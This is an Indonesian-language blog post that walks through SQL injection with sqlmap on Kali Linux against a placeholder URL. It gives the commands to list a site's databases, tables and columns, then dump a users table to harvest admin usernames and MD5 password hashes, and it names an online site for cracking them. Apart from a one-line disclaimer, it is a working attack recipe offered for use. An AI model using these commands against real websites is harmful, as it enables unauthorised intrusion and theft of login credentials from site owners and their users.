Tuesday, February 16, 2016

sql injection dengan sqlmap di kali linux


Assalamualaikum

Seperti gambar di atas itu adalah hasil dari sql injection dengan sqlmap di kali linux
Bagaimana cara menggunakanNya saya akan membagikan tutorialNya
oke langsung saja

1. Buka Terminal anda
Ketikan perintah seperti berikut

sqlmap -u http://target.com/news.php?id=12 --dbs

#~ http://target.com/news.php?id=12 bisa di ganti web vuln sql yang sudah ente siapkan
#~ --dbs : melihat nama database website
#~ -u : target url

2.Jika sudah,akan tampil nama database websiteNya contoh disini ada nama database info_web kita akan meihat tabel dan kolomNya dengan menggunakan perintah sebagai berikut:

sqlmap -u http://target.com/news.php?id=12 --dbs -D info_web --tables -> untuk melihat tabel

sqlmap -u http://target.com/news.php?id=12 --dbs -D info_web --columns -> untuk melihat kolom

#~ -D : Nama Database

3. Jika sukses, akan muncul nama tabelNya cari tabel yang berkaitan dengan admin login contoh di sini ada tabel users kita dump isiNya menggunakan perintah

sqlmap -u http://target.com/news.php?id=12 --dbs -D info_web --tables users --dump


#~ --dump : untuk melihat isi tabel

4.Dan tunggu sampai selesai.. disitu akan muncul username dan password. passwordNya berbentuk md5 bisa anda crack di hashkiller.co.uk atau web md5crack yang lain


#~ Hanya Tutorial, kami tidak mensarankan anda merusak web!

.
Share:

0 comments:

Post a Comment

Popular Posts

Recent Posts